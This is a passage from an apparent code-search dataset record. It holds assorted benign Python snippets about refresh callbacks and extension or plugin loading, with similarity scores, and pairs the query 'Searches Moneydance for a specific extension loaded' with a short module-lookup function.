timeout=20)\n self.web_welcome.verify_welcome_screen()\n self.web_welcome.click_accept_all_btn()\n self.driver.switch_to_webview(webview_name='NATIVE_APP')\n self.driver.wait_for_context(WEBVIEW_CONTEXT.SMART, timeout=20)\n # Currently HPID take 10-20s to load to value prop screen.\n self.value_prop.verify_ows_value_prop_screen()", "def update_callback(self):\n self.schedule_update_ha_state(True)", "def update_callback(self):\n self.schedule_update_ha_state(True)", "def update_has_data(self):\n self.main()", "def refresh_screen(self):\n stdscr = self.stdscr\n stdscr.refresh()", "def handleReload(self, confInfo=None):", "def consumer_refresh(self):\r\n if not self.perms_mask & DPROP_PERM_REFRESH:\r\n raise DevicePropertyPermError, \"refresh permission denied\"\r\n\r\n self.device_refresh_cb()", "def trigger_refresh(self):\n self.get_selected()\n self.manage_loading(loading=True)\n self.current_feed.fetch_content(unread_only=self.show_unread_only)\n self.manage_actions()", "def on_preview_refresh_activate(self,widget,data=None):\n self.app._update_preview()", "def syncrepl_refreshdone(self):\n pass", "def refresh(self):\n self.fetch(False)", "def after_update(self, *args):\n raise NotImplementedError", "def _update(self):\n pass", "def _resolution_changed(self):\n self.reinitialiseData()", "def _update_view(self):\n NavigationToolbar2._update_view(self)\n\n self._myParent.evt_view_updated()\n\n return", "def reload(self):\n\n pass", "async def async_update(self):\n _LOGGER.debug(\n \"SynoDSMSurveillanceHomeModeToggle.async_update(%s)\",\n self._api.information.serial,\n )\n self._state = await self.hass.async_add_executor_job(\n self._api.surveillance_station.get_home_mode_status\n )", "async def notify_view(self):\n await self.game_view.notify()", "def on_load(self):\n pass", "def on_load(self):\n pass", "def _update_callback(self) -> None:\n self.metoffice_site_id = self._data.site_id\n self.metoffice_site_name = 
self._data.site_name\n self.metoffice_now = self._data.now\n self.async_write_ha_state()", "def update(self):\r\n pass", "def reload_info(self):\n self.__loop.run_until_complete(self.__reload_info())", "def on_first_registration(self):\n self.main.tabify_plugins(self.main.help, self)\n self.dockwidget.hide()", "def onOpen(self):", "def on_action_set_view(self, content):\n self._view = content['view']\n self.refresh_traits_widget()", "def update(self):", "def update(self):", "def update(self):", "def _refreshActionTriggeredSlot(self):\r\n \r\n self._controller.model.refresh(self._controller.model.activeIndex)", "def updateDisplay(self):\n if self._displayPjt:\n self._displayPjt.updateim()\n if self._displayUsr:\n self._displayUsr.updateim()\n if self._displayVtk:\n self._displayVtk.updateim()", "def reset(self):\n self.home()", "def settings_updated(self):\n super(ItemListView, self).settings_updated()\n show_mode = str(settings.get('items', 'show_mode'))\n self.unread_only_default = show_mode.find('unread') != -1\n self.show_mode_save = show_mode.find('nosave') == -1", "def conf_update(self):\n pass", "def updateWidget(self):\n pass", "def _refresh_pref_decls(self):\n workbench = self.workbench\n point = workbench.get_extension_point(PREFS_POINT)\n extensions = point.extensions\n\n # If no extension remain clear everything\n if not extensions:\n self._pref_decls.clear()\n return\n\n # Map extension to preference declaration\n new_ids = dict()\n old_ids = self._pref_decls\n for extension in extensions:\n if extension.plugin_id in old_ids:\n pref = old_ids[extension.plugin_id]\n else:\n pref = self._load_pref_decl(extension)\n new_ids[extension.plugin_id] = pref\n\n self._pref_decls = new_ids" ]
[ "0.70166314", "0.67420226", "0.67126137", "0.6558181", "0.6547368", "0.6456297", "0.62285334", "0.61892396", "0.6178164", "0.6083877", "0.59968984", "0.59863025", "0.5978254", "0.5940049", "0.5935096", "0.5920283", "0.59084743", "0.58467805", "0.58467805", "0.58374125", "0.58041275", "0.5804079", "0.5803662", "0.5737976", "0.5737976", "0.5737976", "0.5722338", "0.56882226", "0.56865776", "0.5680478", "0.56715494", "0.56665576", "0.56665576", "0.56665576", "0.5636496", "0.5632486", "0.5630555", "0.5612787", "0.561155", "0.5609844", "0.56086046", "0.5603272", "0.5600497", "0.5600497", "0.55969214", "0.5571575", "0.5544049", "0.5538212", "0.55276865", "0.5527598", "0.55142283", "0.5503982", "0.5484367", "0.5481851", "0.5476838", "0.5476838", "0.5473031", "0.5460443", "0.54599285", "0.54582673", "0.5452427", "0.5437691", "0.54361516", "0.5435025", "0.5428268", "0.54236263", "0.54236263", "0.5408327", "0.5405012", "0.54006875", "0.539996", "0.53996265", "0.53929496", "0.5374104", "0.5363752", "0.53609294", "0.53431344", "0.5342264", "0.5340438", "0.53381544", "0.5326383", "0.5325952", "0.53224695", "0.53224695", "0.5315746", "0.5310002", "0.5302442", "0.5301524", "0.5290214", "0.5287473", "0.528597", "0.528597", "0.528597", "0.5284254", "0.5276375", "0.5276236", "0.527554", "0.5271364", "0.52664894", "0.52642846" ]
0.7383542
0
Searches Moneydance for a specific extension loaded
def find_feature_module(theModule):
    # type: (str) -> bool

    fms = MD_REF.getLoadedModules()
    for fm in fms:
        if fm.getIDStr().lower() == theModule:
            myPrint("DB", "Found extension: %s" %(theModule))
            return fm
    return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_loaded_extensions():\n raise NotImplementedError()", "def load_extensions(self):\n extension_module_name = f\"{utils.get_project_name()}.cogs\"\n for extension in CONF.LOADED_EXTENSIONS:\n try:\n self.load_extension(extension_module_name + \".\" + extension)\n LOG.debug(f\"The extension '{extension.split('.')[0]}' has been successfully loaded\")\n except Exception as e:\n message = f\"Failed to load extension '{extension.split('.')[0]}'\"\n LOG.exception(log.get_log_exception_message(message, e))", "def find(self):\n extension_hooks = list()\n #Find all extension names\n dirs = pylabs.q.system.fs.listDirsInDir(self.rootDir, True,findDirectorySymlinks=True)\n # Use a simple PMExtensionFactory\n factory = PMExtensionFactory()\n for dir in (d for d in dirs if pylabs.q.system.fs.exists(os.path.join(d, self.extensionConfigName))):\n #we found possible extension because extension.cfg file found\n pylabs.q.logger.log('Found extension in %s' % dir, 6)\n # Load extension ini file\n configfilePath = os.path.join(dir, self.extensionConfigName)\n inifile = pylabs.inifile.IniFile(configfilePath)\n path = pylabs.q.system.fs.getDirName(configfilePath)\n hooks = self._getHookInformation(inifile, path, factory)\n extension_hooks.extend(hooks)\n return extension_hooks", "def find_extension(self, name):\n return unpack([extension for extension in self.extensions\n if extension.name == name], singleton=True)", "def extensions():\n\n pass", "async def load(ctx, cog):\n\tos.chdir(os.path.dirname(os.path.realpath(__file__)))\n\tif path.exists(\"cogs/\"+cog+\".py\"):\n\t\tprelen = len(bot.commands)\n\t\t\n\t\tbot.load_extension('cogs.'+cog)\n\n\t\t#checking if the extension loaded\n\t\tif len(bot.commands) > prelen:\n\t\t\tawait ctx.send('Loaded extension.')\n\t\telse:\n\t\t\tawait ctx.send('Failed to load extension.')\n\telse:\n\t\tawait ctx.send('No such extension.')", "def getExtension(self): #$NON-NLS-1$\r", "async def load(self, ctx, *, extension: str):\r\n try:\r\n self.bot.load_extension(extension)\r\n await ctx.send(f\":ok_hand: Loaded module `{extension}`\")\r\n except Exception as e:\r\n await ctx.send(f\":sob: I-I'm sorry, I couldn't load the `{extension}` module >w< \"\r\n + f\"```py\\n{traceback.format_exc()}```\")", "def extension(self):\n return self.extensions[0]", "def findExtensions(self):\n if SYSTEM_EXTENSIONS:\n self._populateExtensions()\n return\n\n pylabs.q.logger.log('Loading pylabs extensions from %s' % self.extensionsRootPath,7)\n\n #Add extensions base dir to sys.path\n sys.path.append(self.extensionsRootPath)\n\n SYSTEM_EXTENSIONS.extend(self.findExtensionInfo())\n\n self._populateExtensions()", "async def tool_load(self, ctx, *, cog: str):\n\n try:\n self.bot.load_extension(cog)\n except Exception as e:\n await zb.bot_errors(ctx,sp.format(e))\n else:\n await ctx.send('**`SUCCESS`**')", "async def extensions(ctx):\n if ctx.invoked_subcommand is None:\n embed = Embed(\n title=\"Extensions\",\n description=\"The following extensions are loaded:\",\n colour=bot.colors['default']\n )\n for k, v in bot.cogs.items():\n embed.add_field(\n name=k,\n value=v.description,\n inline=False)\n await ctx.channel.send(embed=embed)", "def check_if_extension_exists(self, extension):\n cursor = self.conn.cursor()\n cursor.execute(\"SELECT EXISTS(SELECT * FROM pg_extension WHERE extname = %s)\", (extension,))\n self.conn.commit()\n return cursor.fetchone()[0]", "def get_extension(self, extension):\n return self.db.get(extension)", "def test_load(self):\n class TestExtension(Extension):\n 
pass\n\n self.setup_extension(TestExtension, enable=False)\n\n self.assertEqual(self.manager.get_installed_extensions(),\n [TestExtension])\n self.assertEqual(len(self.manager.get_enabled_extensions()), 0)\n self.assertTrue(hasattr(TestExtension, 'info'))\n self.assertEqual(TestExtension.info.name, self.test_project_name)\n self.assertTrue(hasattr(TestExtension, 'registration'))\n self.assertEqual(TestExtension.registration.name,\n self.test_project_name)", "def load_extensions(self, config):\n loaded_extensions = []\n for extension in self.extensions:\n load_func = getattr(extension, \"load\")\n loaded_extension = load_func(config)\n if loaded_extension:\n loaded_extensions.append(loaded_extension)\n return loaded_extensions", "def _search_for_extension(self, searched_extension: str) -> str:\n for folder in self.folders:\n for extension in folder.get_extensions():\n if searched_extension == extension:\n return str(folder)\n return \"\"", "def iter_extension_paths():\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))", "async def extension_load(self, ctx, extension: str):\n try:\n self.bot.load_extension(extension)\n await ctx.reply(f\"Successful extension loading: `{extension}`\")\n\n except commands.ExtensionNotLoaded:\n ctx.reply(f\"The extension `{extension}` was not found.\")\n\n except commands.ExtensionAlreadyLoaded:\n ctx.reply(f\"The extension `{extension}` is already loaded.\")\n\n except Exception:\n file = discord.File(io.StringIO(traceback.format_exc()), filename=f\"{extension}.txt\")\n await ctx.send(f\"extension loading fail: `{extension}`\", file=file)", "def get_required_extensions(self):\n return []", "def _add_extensions(self):\n ext_cache_down = 'cache_downloading'\n ext_cache_up = 'cache_uploading'\n cmd_args = self.task_data.get('cmd_args', {})\n if not isinstance(cmd_args, dict):\n cmd_args = {}\n if cmd_args.get('save_raw_pages', False):\n self.required_signals[SIGNAL_SPIDER_OPENED]['wait'] += \\\n EXTENSION_SIGNALS[ext_cache_up]\n if cmd_args.get('load_raw_pages'):\n self.required_signals[SIGNAL_SCRIPT_CLOSED]['wait'] += \\\n EXTENSION_SIGNALS[ext_cache_down]", "def findModule(name):", "def extensions(self, global_step):\n return []", "def extensions(self, global_step):\n return []", "def _load_extensions(path):\n extension_dir = os.environ.get(path, path)\n print(f\"looking for extensions in {extension_dir}\")\n if not os.path.isdir(extension_dir):\n print(f\"No such {extension_dir}\")\n return\n\n import sys \n import importlib\n\n sys.path.append(path)\n imports = [ filename \n for filename in os.listdir(path)\n if not filename.startswith('__') \n and not filename.startswith('.') \n ]\n for filename in imports:\n module_name, _ = os.path.splitext(filename)\n module = importlib.import_module(module_name)\n for attribute_name in dir(module):\n if attribute_name.startswith('__'):\n continue\n globals()[attribute_name] = getattr(module, attribute_name)", "def get(self, name):\n ext = self.extensions.get(name)\n\n if not ext:\n ext = self.builtin(name)\n\n if not ext:\n self.discover()\n\n try:\n ext = self.extensions[name]\n except KeyError:\n raise InternalError(\"Unknown '{}' extension '{}'\"\n .format(self.type_, name))\n return ext", "def getAssetExtension(asset, extension):\n\n if asset.get('extensions') == None:\n return None\n\n return asset['extensions'].get(extension)", "def load_clis(namespace='softboxen.cli'):\n LOG.debug('searching 
namespace %s', namespace)\n\n extensions = {\n entry_point.name: entry_point.load()\n for entry_point\n in pkg_resources.iter_entry_points(namespace)\n }\n\n discovered_clis = []\n\n for identity, impl in extensions.items():\n if not issubclass(impl, base.CommandProcessor):\n LOG.warning('ignoring non-compliant implementation %s', identity)\n continue\n\n LOG.debug('found extension module %s for vendor %s, model %s, '\n 'version %s', impl, impl.VENDOR, impl.MODEL, impl.VERSION)\n\n discovered_clis.append(impl)\n\n return discovered_clis", "def extension(self) -> str:", "def test_get_extension(self):\n\n spec = {\n \"$ext\": {\n \"function\": \"operator:add\",\n }\n }\n\n validate_extensions(spec, None, None)", "async def load_all_extensions(self, reload=False):\n succeeded = {}\n for extension in get_extensions():\n try:\n if reload or extension not in self.cogs_loaded:\n self.load_extension(f'cogs.{extension}')\n l.info(f\"Loaded extension '{extension}'\")\n self.cogs_loaded.add(extension)\n succeeded[extension] = True\n except Exception as e:\n error = f\"{extension}\\n {type(e).__name__} : {e}\"\n l.error(f\"Failed to load extension '{error}'\")\n succeeded[extension] = False\n if succeeded:\n l.info(LOG_SEP)\n return succeeded", "def _find_extension(pth):\n for i, hdu in enumerate(pth):\n if hdu.header.get('PIXTYPE') == 'HEALPIX':\n return i\n else:\n raise IndexError(\"No HEALPIX extensions found in %s\" % pth.filename())", "def find_by_extension(extension):\n for format in FORMATS:\n if extension in format.extensions:\n return format\n\n raise UnknownFormat('No format found with extension \"%s\"' % extension)", "async def load_cog(self, ctx, *, cog: str):\n\n try:\n self.bot.load_extension(cog)\n except Exception as e:\n await ctx.send(f'**`ERROR:`** {type(e).__name__} - {e}')\n else:\n await ctx.send('**`SUCCESS`**')", "def load_extensions(self, *exts):\n for ext in exts:\n try:\n self.load_extension(ext)\n logger.info(f\"Successfully loaded cog {ext}.\")\n except Exception:\n logger.error(f\"Failed to load cog: {ext}: {format_exc()}\")\n\n logger.info(\"Cog loading complete.\")", "def getExtension(path: unicode, extLevel: int) -> unicode:\n ...", "def __load_cogs(self):\n for cog in self.__cogs.get():\n logging.info('loading %s', cog)\n self.load_extension(cog)", "async def load_all_extensions(self):\n await self.wait_until_ready()\n await asyncio.sleep(1)\n\n cogs = [\"cogs.member\",\n \"cogs.officer\",\n \"cogs.rolemanager\",\n \"cogs.database\",\n \"cogs.everyone\",\n \"cogs.nodewar\",\n \"cogs.twitch\"]\n\n for extension in cogs:\n try:\n self.load_extension(extension)\n print(f'loaded {extension}')\n except Exception as e:\n error = f'{extension}\\n {type(e).__name__} : {e}'\n print(f'failed to load extension {error}')\n print('-' * 10)\n\n for guild in self.guilds:\n if not discord.utils.get(guild.roles, name=self.manager_role):\n await self.create_bot_manager(guild)\n\n print(f\"\\nUsername: {self.user}\\nID: {self.user.id}\")", "async def load_cog(self, ctx, *, cog: str):\n\n try:\n await self.bot.load_extension(f'cogs.{cog}')\n except Exception as e:\n await ctx.send(f'**`ERROR:`** {type(e).__name__} - {e}')\n else:\n await ctx.send('**`SUCCESS`**')", "def test_get_built_in_extension(self):\n\n spec = {\n '$ext': {\n \"function\": \"random_string\",\n \"extra_args\": [4]\n }\n }\n\n validate_extensions(spec, None, None)", "def _find_extension(self, ext_type, types, values):\n counter = 0\n # For the APLN extension, grab the value in ASCII.\n if ext_type == 
b\"\\x00\\x10\":\n while counter < len(types):\n if types[counter] == ext_type:\n return ((values[counter][3:]).decode())\n counter += 1\n else:\n while counter < len(types):\n if types[counter] == ext_type:\n return values[counter].hex()\n counter += 1\n\n return \"\"", "def test_register_with_another_extension(self):\n DummyLoader.register()\n DummyLoader.register(extensions=('.example2',))\n self.assertIs(getattr(sys, HOOK_NAME)['.example2'], DummyLoader)", "def __getitem__(self, name):\r\n if self._extensions_by_name is None:\r\n d = {}\r\n for e in self.extensions:\r\n d[e.name] = e\r\n self._extensions_by_name = d\r\n return self._extensions_by_name[name]", "def get_extension(self) -> Optional[str]:\n return self.extension", "def get_matched_extensions(request):\n\n def _match(e):\n return e.obj if e.obj.matches(request) else None\n\n result = EXTENSION_MANAGER.map(_match)\n return filter(bool, result)", "def find(self):\n extension_hooks = list()\n eggs = find_eggs(self.rootDir)\n factory = EggPMExtensionFactory()\n for egg in eggs:\n # Add egg to path so other parts of pylabs can import its contents\n eggfile = egg.location\n sys.path.append(eggfile)\n for filePointer, path in self._generateExtensionConfigFilePointers(eggfile):\n inifile = pylabs.inifile.IniFile(filePointer)\n hooks = self._getHookInformation(inifile, path, factory)\n extension_hooks.extend(hooks)\n return extension_hooks", "def _parse_extensions(self):\n for root in self.roots:\n for extensions in root.iter('extensions'):\n for extension in extensions.iter('extension'):\n extension_name = extension.attrib.get('name', '')\n #print(f'Extension: {extension_name}')\n self.extensions.append(extension_name)\n\n extension_apis = extension.attrib.get('supported', '')\n extension_api_list = set(extension_apis.split('|'))\n\n # filter by api\n if 'gl' not in extension_apis:\n continue\n\n for require in extension.iter('require'):\n for enum in require.iter('enum'):\n enum_name = enum.attrib.get('name', '')\n self.enum_list.append(enum_name)\n self.enum_required_by_extension[enum_name].append({\n \"name\": extension_name,\n \"api_list\": extension_api_list})\n for command in require.iter('command'):\n command_name = command.attrib['name']\n self.command_list.append(command_name)\n self.command_required_by_extension[command_name].append({\n \"name\": extension_name,\n \"api_list\": extension_api_list})", "async def extension_reload_all(self, ctx):\n msg = []\n\n ext = self.bot.extensions.copy()\n\n for extension in ext:\n try:\n self.bot.reload_extension(extension)\n msg.append(f\"Successfully reloading: `{extension}`\")\n\n except commands.ExtensionNotFound:\n msg.append(f\"The extension `{extension}` was not found.\")\n\n except Exception:\n msg.append(f\"extension load fail: `{extension}`\")\n file = discord.File(io.StringIO(traceback.format_exc()), filename=f\"{extension}.txt\")\n await ctx.reply(file=file)\n\n msg.append(f\"\\nloaded extensions: {len(self.bot.extensions)}/{len(ext)}\")\n await ctx.reply(\"\\n\".join(msg))", "def load_extension(self, name):\n if name in self.__extensions.loaded_by_core:\n raise commands.ExtensionAlreadyLoaded(name)\n try:\n cog_module = importlib.import_module(f'extensions.{name}.cogs')\n except ImportError:\n cog_module = importlib.import_module(f'hero.extensions.{name}.cogs')\n\n self.__settings[name] = self.__extensions[name].get_settings(self)\n self.__controllers[name] = self.__extensions[name].get_controller(self)\n\n if hasattr(cog_module, 'setup'):\n cog_module.setup(self, name)\n 
else:\n cog_classes = inspect.getmembers(cog_module, lambda member: isinstance(member, type) and\n issubclass(member, hero.Cog) and member is not hero.Cog)\n for _, _Cog in cog_classes:\n if _Cog is None:\n raise ImportError(f\"The {name} extension's cog module didn't have \"\n f\"any Cog subclass and no setup function\")\n self.add_cog(_Cog(self, self.__extensions[name]))\n\n self.__extensions.loaded_by_core.append(name)\n return cog_module", "def search_registry(filename):\n for converter in data_importers:\n if converter.check_importable(filename):\n return converter\n logging.error('No converter found', filename)\n return False", "def getExtension(self, *args):\n return _libsbml.SBMLExtensionRegistry_getExtension(self, *args)", "def discover(self, name=None):\n for obj in iter_entry_points(group=self.group, name=name):\n ext = _Extension(self.type_, obj)\n self.extensions[ext.name] = ext", "def SearchFileType(ext, message0 = \"\", message1 = \"\", message2 = \"\"):\n extList = glob.glob('*'+ext)\n ChooseNumOption(extList, \"file\", ext, message0, message1, message2, True)", "def imp_find_dotted_module(name):\n path = None\n for x in name.split('.'):\n result = imp.find_module(x, path)\n path = [result[1]]\n return result", "def imp_find_dotted_module(name):\n path = None\n for x in name.split('.'):\n result = imp.find_module(x, path)\n path = [result[1]]\n return result", "def _load_library_extensions():\n group = 'helga_handlers'\n entry_points = pkg_resources.iter_entry_points(group=group)\n plugins = []\n for ep in entry_points:\n try:\n logger.debug('loading entry_point %s' % ep.name)\n plugin = ep.load()\n plugin._helga_name_ = ep.name\n plugins.append(plugin)\n except Exception as error:\n logger.error(\"Error initializing plugin %s: %s\" % (ep, error))\n return plugins", "def get_pending_ext(confirm_auth):\n extension = _PENDING % confirm_auth\n return extension", "def scan_plugin(self):\n pluginpath=_module_path()\n plugins=[]\n for f in os.listdir(pluginpath):\n if os.path.isfile(os.path.join(pluginpath,f)) and os.path.splitext(os.path.join(pluginpath,f))[-1]=='.py' :\n if 'plugin_' in os.path.basename(f):\n logger.debug(\"found plugin : %s\",f)\n plugins.append(f)\n return plugins", "def init_extensions(self, package, module):\n\n pass", "def get_supported_extensions(ext=\".as\"):\n result = list(ext + x for x in LOADERS.keys())\n result.append(ext)\n return result", "def get_extension(self) -> str:\n return self._extension", "def request_plugins(self):", "def list_extensions(self, **_params):\r\n return self.get(self.extensions_path, params=_params)", "def get_startup_extensions(self):\n final_list = []\n for entry in self.bot_data_file[\"startup_extensions\"]:\n final_list.append(str(entry[\"name\"]))\n return final_list", "def __find_eligible_plugins_in_directory(cls, directory_to_search):\n\n plugin_files = [\n x\n for x in os.listdir(directory_to_search)\n if x.endswith(\".py\") and x[0:-3] != \"__init__\"\n ]\n return plugin_files", "def is_extension_supported(request, extension_alias):\n extensions = list_extensions(request)\n for extension in extensions:\n if extension['alias'] == extension_alias:\n return True\n else:\n return False", "def find_plugins():\n return list(straight.plugin.load('csbot.plugins', subclasses=Plugin))", "def check_extensions(self):\n extensions = self.cloud.get_network_extensions()\n for network_extension in self.neutron_extensions:\n if network_extension not in extensions:\n LOGGER.warning(\n \"Cannot find Neutron extension: %s\", 
network_extension)\n self.is_skipped = True\n break", "def test_get_enabled_extensions_returns_empty(self):\n self.manager = TestExtensionManager([], '')\n self.manager.load()\n\n self.assertEqual(len(self.manager.get_enabled_extensions()), 0)", "def test_badge_should_have_extensions(self):\n\n badge = self.get_sample_badge()\n self.assertTrue(hasattr(badge, 'extensions'))", "def load_ep(entry_point):\n logger.debug('Loading extension: %s', entry_point)\n try:\n func = entry_point.load()\n func()\n except Exception as e:\n msg = (f\"Numba extension module '{entry_point.module}' \"\n f\"failed to load due to '{type(e).__name__}({str(e)})'.\")\n warnings.warn(msg, stacklevel=3)\n logger.debug('Extension loading failed for: %s', entry_point)", "def search_ext(self,strz):\n\t\tfor ext in file_type:\t#file_type = list of allow extension words\n\t\t\tif strz.endswith(ext):\n\t\t\t\tself.extension=ext\n\t\t\t\treturn strz.replace(ext,\"\")\n\t\treturn strz", "def show_extension(self, ext_alias, **_params):\r\n return self.get(self.extension_path % ext_alias, params=_params)", "async def _reload(self, ctx, *, module: str=None):\n if module is None or module == \"all\":\n await ctx.message.add_reaction('\\N{HOURGLASS}')\n try:\n for extension in startup_extensions:\n self.bot.unload_extension(extension)\n self.bot.load_extension(extension)\n except Exception as e:\n await ctx.message.remove_reaction('\\N{HOURGLASS}', ctx.me)\n await ctx.message.add_reaction('\\N{CROSS MARK}')\n await ctx.send('{}: {}'.format(type(e).__name__, e))\n traceback.print_exc()\n else:\n await ctx.message.remove_reaction('\\N{HOURGLASS}', ctx.me)\n await ctx.message.add_reaction('\\N{WHITE HEAVY CHECK MARK}')\n else:\n await ctx.message.add_reaction('\\N{HOURGLASS}')\n try:\n self.bot.unload_extension(module)\n self.bot.load_extension(module)\n except Exception as e:\n await ctx.message.remove_reaction('\\N{HOURGLASS}', ctx.me)\n await ctx.message.add_reaction('\\N{CROSS MARK}')\n await ctx.send('{}: {}'.format(type(e).__name__, e))\n traceback.print_exc()\n else:\n await ctx.message.remove_reaction('\\N{HOURGLASS}', ctx.me)\n await ctx.message.add_reaction('\\N{WHITE HEAVY CHECK MARK}')", "def ext(self):\n return self._getbyspec(\"ext\")[0]", "def find(self, egg):", "def search(cls, name, lookup=[]):\r\n if os.path.isfile(name): return name\r\n for spath in lookup:\r\n fname = os.path.join(spath, name)\r\n if os.path.isfile(fname):\r\n return fname\r\n for ext in cls.extensions:\r\n if os.path.isfile('%s.%s' % (fname, ext)):\r\n return '%s.%s' % (fname, ext)", "def find_related_module(app, related_name):\n\n try:\n app_path = importlib.import_module(app).__path__\n except ImportError as exc:\n warn('Autodiscover: Error importing %s.%s: %r' % (\n app, related_name, exc,\n ))\n return\n except AttributeError:\n return\n\n try:\n f, _, _ = imp.find_module(related_name, app_path)\n # f is returned None when app_path is a module\n f and f.close()\n except ImportError:\n return\n\n return importlib.import_module('{0}.{1}'.format(app, related_name))", "def load(self, name, ignore=True):\n\n # ignore if extension is already loaded\n if name in self.extension:\n return True\n\n loaded = False\n debug('attempting to load extension: {}', name)\n try:\n try:\n plugin = import_module(name)\n except RelengModuleNotFoundError:\n # python 2.7 may not be able to load from a nested path; try\n # searching through each package (if a nested module)\n if sys.version_info >= (3, 0) or '.' 
not in name:\n raise\n\n # split the module into parts and for each part, check to see\n # if it's a package directory; if so, keep going until the last\n # namespace package\n ext_parts = name.split('.')\n path = None\n last_part = ''\n for part in ext_parts[:-1]:\n file, pathname, desc = imp.find_module(part, path)\n\n if desc[-1] != imp.PKG_DIRECTORY:\n raise ImportError(name)\n\n part = last_part + part\n last_part = part + '.'\n\n pkg = sys.modules.get(part, None)\n if not pkg:\n try:\n pkg = imp.load_module(part, file, pathname, desc)\n finally:\n if file:\n file.close()\n path = pkg.__path__\n else:\n path = [pathname]\n\n # with the path of the last namespace package found, find the\n # desired module in this path\n last_part = ext_parts[-1]\n file, pathname, desc = imp.find_module(last_part, path)\n\n plugin = sys.modules.get(name, None)\n if not plugin:\n try:\n plugin = imp.load_module(name, file, pathname, desc)\n finally:\n if file:\n file.close()\n\n if hasattr(plugin, 'releng_setup'):\n if not ignore:\n plugin.releng_setup(self)\n loaded = True\n else:\n try:\n plugin.releng_setup(self)\n loaded = True\n except RelengInvalidSetupException as e:\n warn('extension is not supported '\n 'due to an invalid setup: {}\\n'\n ' ({})', name, e)\n except RelengVersionNotSupportedException as e:\n warn('extension is not supported '\n 'with this version: {}\\n'\n ' ({})', name, e)\n\n if loaded:\n self.extension.append(name)\n verbose('loaded extension: {}', name)\n loaded = True\n else:\n warn('extension does not have a setup method: {}', name)\n except RelengModuleNotFoundError:\n warn('unable to find extension: {}', name)\n\n return loaded", "async def reload(self, ctx, name: str):\n try:\n self.bot.reload_extension(f\"cogs.{name}\")\n except Exception as e:\n return await ctx.send(default.traceback_maker(e))\n await ctx.send(f\"{emote.check} | Reloaded extension **{name}**\")", "def find_xontrib(name):\n if name.startswith(\".\"):\n spec = importlib.util.find_spec(name, package=\"xontrib2\")\n else:\n spec = importlib.util.find_spec(\".\" + name, package=\"xontrib2\")\n return spec or importlib.util.find_spec(name)", "def CompExtension_getPackageName():\n return _libsbml.CompExtension_getPackageName()", "def reload_cogs(self):\n\n for extension in list(self.extensions):\n try:\n self.reload_extension(extension)\n except errors.NoEntryPointError:\n log.info(\"The extension {extension} has no setup function\")\n pass\n except errors.ExtensionAlreadyLoaded:\n pass\n\n log.info(f\"Reloaded {len(self.extensions)} cogs\")", "def __getitem__(self, addonName):\r\n if self.__contains__(addonName):\r\n return self.addons[addonName]\r\n raise AddonError, \"Addon %s does not exist\" % addonName", "def defaultExtension(self):\n result = self.EXTERNAL_TYPES[self.typ]\n if not self.fileExtensions:\n return result\n if result in self.fileExtensions:\n return result\n return self.fileExtensions[0]", "def get_available_extensions() -> DefaultDict[str, Type]:\n all_extensions:DefaultDict[str, Type] = defaultdict(lambda:False)\n for current_class in Content.__subclasses__():\n for extension in current_class.extensions:\n all_extensions[extension] = current_class\n return all_extensions", "def _scan_for_service_extensions_under_code_container(self, container):\n extcoll = collect_extensions_under_code_container(container, UpnpServiceProxy)\n for _, extcls in extcoll:\n if (hasattr(extcls, \"SERVICE_MANUFACTURER\") and hasattr(extcls, \"SERVICE_TYPE\")):\n svc_manufacturer = getattr(extcls, 
\"SERVICE_MANUFACTURER\")\n svc_type = getattr(extcls, \"SERVICE_TYPE\")\n extkey = generate_extension_key(svc_manufacturer, svc_type)\n self._register_service(extkey, extcls)\n return", "def _find_mod(self, item, match_only=False):\n for iface in self._scan:\n for bname in self._scan[iface]:\n if os.path.basename(bname) == item:\n self._load_item(iface, bname)\n if item in self._loaded:\n return self._loaded[item]\n if not match_only:\n for iface in self._scan:\n for bname in self._scan[iface]:\n if self._scan[iface][bname].get(\"loaded\"):\n continue\n self._load_item(iface, bname)\n if item in self._loaded:\n return self._loaded[item]\n # Let's see if the module being lookup is in the load errors dictionary\n if item in self._load_errors:\n # Return the LoadError\n return self._load_errors[item]", "def _get_info(self, fullmodname):\n parts = fullmodname.split('.')\n submodname = parts[-1]\n modpath = '/'.join(parts)\n for suffix, is_package in _SEARCH_ORDER:\n relpath = modpath + suffix\n try:\n self.datablocks[relpath]\n except KeyError:\n pass\n else:\n return submodname, is_package, relpath\n msg = ('Can\\'t find module %s in .blend %r' %\n (fullmodname, self.path_entry))\n ##logging.debug(msg)\n raise BlendImportError(msg)", "def get_ext(self, name):\n # Optimizations to reduce attribute accesses\n m2x509_get_ext = m2.x509_get_ext\n m2x509_extension_get_name = m2.x509_extension_get_name\n x509 = self.x509\n \n for i in range(m2.x509_get_ext_count(x509)):\n extPtr = m2x509_get_ext(x509, i)\n if m2x509_extension_get_name(extPtr) == name:\n return X509_Extension(extPtr, _pyfree=0)\n\n raise LookupError", "def _get_extension_resource(api_root):\n # TODO: Cache this. We only use this resource as a link to sub-resources.\n return api_root.get_extension(\n extension_name='reviewbotext.extension.ReviewBotExtension')", "def _find_pricing_script(self, script_tag):\n find = False\n counter = -1\n while not find:\n counter += 1\n try:\n script_text = script_tag[counter].text\n except:\n print(\n 'WARNING: Could not find the script section with price history, check web address and/or '\n 'scraping mechanism.')\n\n if 'Price, USD' in script_text:\n find = True\n\n return script_text", "def list_phonebooks(path=\".\"):\n files = os.listdir(path)\n for file in files:\n if file.endswith(EXTENSION):\n print file", "def extensions(self):\n return self.properties.get('extensions',\n EntityCollection(self.context, Extension,\n ResourcePath(\"extensions\", self.resource_path)))", "def find_extensions(self, cls, cardinality, mace_time=60):\n n = self.cardinality\n ne = ['c'+str(x)+'!=c'+str(y) for x in range(n) for y in range(x+1,n)]\n return prover9(cls.axioms+ne+self.positive_diagram('c'), [], \n mace_time,0,cardinality)", "def extensions(self):\n raise NotImplementedError()", "def test_load_with_enabled_by_default(self):\n class TestExtension(Extension):\n pass\n\n self.setup_extension(TestExtension, enable=False)\n\n self.assertEqual(self.manager.get_installed_extensions(),\n [TestExtension])\n\n enabled_extensions = self.manager.get_enabled_extensions()\n self.assertEqual(len(enabled_extensions), 1)\n self.assertIsInstance(enabled_extensions[0], TestExtension)\n\n self.assertTrue(hasattr(TestExtension, 'info'))\n self.assertEqual(TestExtension.info.name, self.test_project_name)\n self.assertIsNotNone(TestExtension.instance)\n self.assertTrue(hasattr(TestExtension, 'registration'))\n 